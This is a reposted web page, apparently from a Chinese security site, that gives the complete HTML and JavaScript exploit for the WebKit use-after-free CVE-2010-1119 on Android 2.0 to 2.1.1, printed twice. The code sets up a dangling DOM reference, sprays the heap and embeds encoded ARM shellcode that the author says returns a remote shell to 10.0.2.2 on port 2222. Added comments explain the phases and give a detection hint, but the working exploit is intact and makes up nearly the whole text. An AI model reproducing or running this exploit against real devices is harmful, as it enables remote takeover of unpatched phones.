Android 系统攻击 0DAY!WebKit Use-After-Free Exploit(CVE-2010-1119),受影响版本:2.0、2.1、2.1.1
2011-04-25 23:01
<html>
<!–
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
–>
<head>
<script language=”JavaScript”>
// heap(): proof-of-concept body for the WebKit use-after-free that the page
// header identifies as CVE-2010-1119 (header lists Android 2.0, 2.1, 2.1.1).
// It is invoked from <body onload>. Annotated for analysis and detection; the
// durable mitigation is a browser/WebKit build that contains the fix for that CVE.
//
// Reading aid: the function has three phases.
//   1. Keep a reference to the child node list of an Attr, then remove both the
//      owning element and that child (stale-reference setup).
//   2. Inside a zero-delay timer, allocate many strings and write large
//      repeated strings into the document.
//   3. Read through the saved reference (nodes[0].textContent).
// Detection note: phase 1 followed by bulk unescape()/document.write() of
// repeated data is an unusual combination for a legitimate page.
function heap()
{
// Element whose 'id' attribute node is manipulated below.
var id = document.getElementById(“target”);
var attribute = id.getAttributeNode(‘id’);
// No 'var': 'nodes' becomes an implicit global, which the timer callback reads later.
nodes = attribute.childNodes;
// Remove the element, then the attribute's child node. Script still holds 'nodes'
// afterwards; presumably this is the dangling reference behind the use-after-free
// named in the header. Confirm against the CVE advisory.
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
// Deferred with setTimeout(..., 0). The 70000 short-lived String allocations
// presumably force allocator/GC activity before the later read. TODO confirm.
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape(“\u0058\u0058″)); };
// Two 2-character seed strings; both are doubled in the do/while loop below.
var scode = unescape(“\u0060\u0060″);
var scode2 = unescape(“\u5005\ue1a0″);
// Encoded payload, treated as opaque here. The page header says the exploit
// "returns a shell"; the author's comments below give the port and address.
var shell = unescape(“\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002″);
// Network indicator taken from the author's own comments: TCP port 2222 and
// address 10.0.2.2. NOTE(review): 10.0.2.2 is the address the Android emulator
// uses for the host machine, which suggests an emulator test setup. Confirm.
shell += unescape(“\uae08″); // Port = 2222
shell += unescape(“\u000a\u0202″); // IP = 10.0.2.2
shell += unescape(“\u2000\u2000″); // string terminate
// Double both seed strings until scode exceeds the bound in the loop condition.
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0×1000);
// Append the payload once to the end of the second filler string.
scode2 += shell
// 'target' and the loop index 'i' are implicit globals (no 'var').
target = new Array();
// 300 writes into the document: indices below 130 get scode, indices above 130
// get scode2. Index 130 is never assigned, so document.write receives undefined.
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write(“<br />”);
if (i>250){
// alert(“freeze”);
// Read through the saved reference on iterations 251-299. On an affected build
// this is presumably where the freed object is touched; on a fixed build the
// access should be harmless.
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
<!–
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
–>
<head>
<script language=”JavaScript”>
// heap(): second, identical printing of the proof-of-concept for the WebKit
// use-after-free that the page header identifies as CVE-2010-1119 (header lists
// Android 2.0, 2.1, 2.1.1). It is invoked from <body onload>. Annotated for
// analysis and detection; the durable mitigation is a browser/WebKit build that
// contains the fix for that CVE.
//
// Reading aid: the function has three phases.
//   1. Keep a reference to the child node list of an Attr, then remove both the
//      owning element and that child (stale-reference setup).
//   2. Inside a zero-delay timer, allocate many strings and write large
//      repeated strings into the document.
//   3. Read through the saved reference (nodes[0].textContent).
// Detection note: phase 1 followed by bulk unescape()/document.write() of
// repeated data is an unusual combination for a legitimate page.
function heap()
{
// Element whose 'id' attribute node is manipulated below.
var id = document.getElementById(“target”);
var attribute = id.getAttributeNode(‘id’);
// No 'var': 'nodes' becomes an implicit global, which the timer callback reads later.
nodes = attribute.childNodes;
// Remove the element, then the attribute's child node. Script still holds 'nodes'
// afterwards; presumably this is the dangling reference behind the use-after-free
// named in the header. Confirm against the CVE advisory.
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
// Deferred with setTimeout(..., 0). The 70000 short-lived String allocations
// presumably force allocator/GC activity before the later read. TODO confirm.
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape(“\u0058\u0058″)); };
// Two 2-character seed strings; both are doubled in the do/while loop below.
var scode = unescape(“\u0060\u0060″);
var scode2 = unescape(“\u5005\ue1a0″);
// Encoded payload, treated as opaque here. The page header says the exploit
// "returns a shell"; the author's comments below give the port and address.
var shell = unescape(“\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002″);
// Network indicator taken from the author's own comments: TCP port 2222 and
// address 10.0.2.2. NOTE(review): 10.0.2.2 is the address the Android emulator
// uses for the host machine, which suggests an emulator test setup. Confirm.
shell += unescape(“\uae08″); // Port = 2222
shell += unescape(“\u000a\u0202″); // IP = 10.0.2.2
shell += unescape(“\u2000\u2000″); // string terminate
// Double both seed strings until scode exceeds the bound in the loop condition.
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0×1000);
// Append the payload once to the end of the second filler string.
scode2 += shell
// 'target' and the loop index 'i' are implicit globals (no 'var').
target = new Array();
// 300 writes into the document: indices below 130 get scode, indices above 130
// get scode2. Index 130 is never assigned, so document.write receives undefined.
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write(“<br />”);
if (i>250){
// alert(“freeze”);
// Read through the saved reference on iterations 251-299. On an affected build
// this is presumably where the freed object is touched; on a fixed build the
// access should be harmless.
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>